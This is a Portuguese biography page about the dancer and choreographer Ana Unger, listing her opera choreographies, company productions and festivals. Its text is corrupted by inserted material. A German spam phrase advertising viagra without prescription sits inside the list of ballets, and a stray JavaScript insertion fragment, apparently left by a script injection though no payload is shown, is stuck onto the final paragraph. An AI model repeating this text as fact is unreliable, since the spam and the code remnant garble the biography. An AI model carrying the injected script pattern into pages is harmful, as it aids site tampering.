Currículos

Ana Unger

Ana Unger

Ana Unger

Nasceu em Belém do Pará e se especializou profissionalmente em diversas instituições da Europa e Estados Unidos. Formada em Arquitetura e Urbanismo. É professora registrada pela Royal Academy of Dance – Londres. Formada pelo método de condicionamento físico Gyrotonic® e Gyrokinesis®.

Assinou as coreografias para o Festival de Ópera do Theatro da Paz: Viúva Alegre (2002); Carmem (2004); Bug Jargal (2005); Iara (2006); O Guarany (2007); Romeu e Julieta (2009) e La Traviata (2010). Coreografou o espetáculo em homenagem a Mozart e Shostakovich, com a participação da OSTP.

Produziu e coreografou os espetáculos de sua Companhia de Dança: AmazôniaParáBrasil; Morubixaua; Árvore que Chora – A saga dos homens que ganharam à vista e perderam os olhos; Grita Amazônia; Nuances da Amazônia; Tambores da Floresta; Muiraquitã e os clássicos O Lago dos Cisnes; ist viagra rezeptfrei Dom Quixote; La Bayadere; O Quebra Nozes e A Bela Adormecida.

Roteirizou e dirigiu os espetáculos Abracadança; Ciranda das Cores; Dançando no Universo; Brasil Dança Brasil; Luz; O Presente Precioso; Accqua – O movimento da vida e Olho Mágico. Representou o Pará e o Brasil na França com o show Ritmos do Pará.

Atualmente é bailarina, coreógrafa, produtora artística, diretora do Centro de Formação e Aprimoramento em Dança e Condicionamento Físico e da Cia Ana Unger. Realiza o Encontro Internacional de Dança do Pará e a Bienal de Dança da Amazônia.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.